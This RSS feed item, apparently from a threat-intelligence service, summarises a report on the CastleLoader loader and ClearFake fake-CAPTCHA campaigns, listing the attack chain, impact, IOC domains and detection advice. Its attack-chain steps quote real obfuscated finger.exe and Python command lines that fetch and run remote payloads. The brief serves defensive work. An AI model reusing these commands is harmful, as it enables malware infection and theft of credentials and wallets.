<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Drive-by Download - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/drive-by-download/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 23 Jul 2026 17:15:44 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/drive-by-download/feed.xml" rel="self" type="application/rss+xml"/><item><title>CastleLoader Malware Loader and ClearFake Activity in July 2026</title><link>https://feed.craftedsignal.io/briefs/2026-07-castleloader-clearfake/</link><pubDate>Thu, 23 Jul 2026 17:15:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-castleloader-clearfake/</guid><description>Red Canary reports heightened activity of the CastleLoader malware loader, which uses paste-and-run techniques and legitimate tools to deliver infostealers and RATs, alongside continued prevalence of the ClearFake activity cluster in June 2026.</description><content:encoded><![CDATA[<p>Red Canary's July 2026 Intelligence Insights highlights the continued prevalence of the ClearFake activity cluster and the significant debut of CastleLoader on their top threats list. ClearFake, an activity cluster employing JavaScript injection into compromised websites, delivers malware via drive-by downloads, often utilizing fake CAPTCHA lures to trick users into executing malicious copy-and-paste commands. CastleLoader, also known as CastleBot, is a sophisticated malware loader active since early 2025 that deploys various payloads, including NetSupport Manager, CastleRAT, and .NET-based information stealers. It commonly propagates through paste-and-run campaigns, leveraging social engineering tactics like fake background removal websites and typosquatted job platforms impersonating LinkedIn and Indeed. Attackers use Google Ads for distribution and employ obfuscation techniques, including caret obfuscation in initial commands and multi-layer encoding for its shellcode loader, to evade detection and deliver its final payloads.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Victim accesses a compromised website (e.g., <code>ai-scan[.]digital</code>, <code>bg-transparency[.]online</code>) or typosquatted job platform (e.g., <code>linkedall[.]org</code>, <code>golinked[.]net</code>) distributed via Google Ads.</li>
<li>The website presents a fake CAPTCHA verification (e.g., Cloudflare Turnstile), tricking the user into copying malicious commands to their clipboard.</li>
<li>The user is lured into pasting and executing the malicious commands in a terminal, typically involving caret-obfuscated commands using <code>finger.exe</code>, such as <code>%COMSPEC% /k s^t^a^r^t &quot;&quot; /min for /f &quot;skip=8 delims=&quot; %h in ('f^^i^^n^^g^^e^^r nrLeDHDESi@cheeshomireciple[.]com') do call %h &amp; exit</code>.</li>
<li><code>finger.exe</code> retrieves additional batch commands from adversary-controlled servers, like <code>captcha-checkpoint[.]top</code>.</li>
<li>One batch command downloads portable Python distributions (either CPython or IronPython) disguised as PDF files and extracts them using <code>tar.exe</code>, placing them in a directory like <code>C:\users\&lt;usr&gt;\appdata\local\ironpython.3.4.2\net462\</code>, with the interpreter renamed to a random 12 to 18-digit filename. This is a Bring-Your-Own-Interpreter (BYOI) technique.</li>
<li>Another batch command retrieved by <code>finger.exe</code> executes a Base64-encoded, zlib-compressed Python script through the newly deployed Python interpreter. This script, observed with a command line like <code>&quot;C:\Users\&lt;usr&gt;\AppData\Local\python-3.7.7.1-embed-win32\\\\///////\\\\///////\\\\///////python&quot; -c &quot;import sys,subprocess as s,base64 as b,zlib as z;s.Popen([sys.executable,'-c',z.decompress(b.b64decode('eJydk8FKA0EQ...kb8B3z3XZ8=')).decode('utf-32')],creationflags=s.CREATE_NO_WINDOW)&quot;</code>, retrieves a triple-encoded shellcode loader from resources like <code>hxxps://mirtona[.]com/4ba0af68-0037-5f6e-afd1-64f89fc0f554/loc12</code>.</li>
<li>The decrypted CastleLoader binary is injected into the <code>python.exe</code> process using a shellcode-based loader.</li>
<li>The infected <code>python.exe</code> process establishes C2 communication for further configuration, tasking, and delivery of final payloads, including NetSupport Manager, CastleRAT, or other information stealers.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful compromise by CastleLoader leads to the delivery of various payloads, including remote access tools (RATs) like NetSupport Manager and CastleRAT, as well as .NET-based information stealers. This allows adversaries to gain unauthorized remote control over victim endpoints, exfiltrate sensitive data such as credentials, payment card information, keychain details, and cryptocurrency wallets. The use of legitimate remote access tools disguised as malware makes detection challenging, further exacerbating the impact on victim organizations through potential data breaches, financial fraud, and persistent unauthorized access.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rules in this brief to your SIEM and tune for your environment, specifically focusing on <code>CastleLoader - Suspicious Finger.exe Execution</code> and <code>CastleLoader - Python Interpreter Execution from AppData</code> for initial detection.</li>
<li>Enable process-creation logging (e.g., via Sysmon) to capture command-line arguments and parent-child process relationships, crucial for detecting <code>finger.exe</code> and <code>python.exe</code> anomalies as described in the attack chain.</li>
<li>Block the C2 domains listed in the IOC table (<code>mirtona[.]com</code>, <code>captcha-checkpoint[.]top</code>, <code>ai-scan[.]digital</code>, <code>bg-transparency[.]online</code>, <code>linkedall[.]org</code>, <code>golinked[.]net</code>, <code>indeed-jobs[.]net</code>) at the DNS resolver and proxy levels.</li>
<li>Implement strong egress filtering to restrict outbound connections from user workstations, especially from processes like <code>python.exe</code>, to prevent C2 communication.</li>
<li>Educate users about the risks of paste-and-run techniques and suspicious CAPTCHA prompts on unexpected websites to prevent initial infection.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>malware</category><category>loader</category><category>infostealer</category><category>remote-access-trojan</category><category>paste-and-run</category><category>drive-by download</category><category>windows</category></item></channel></rss>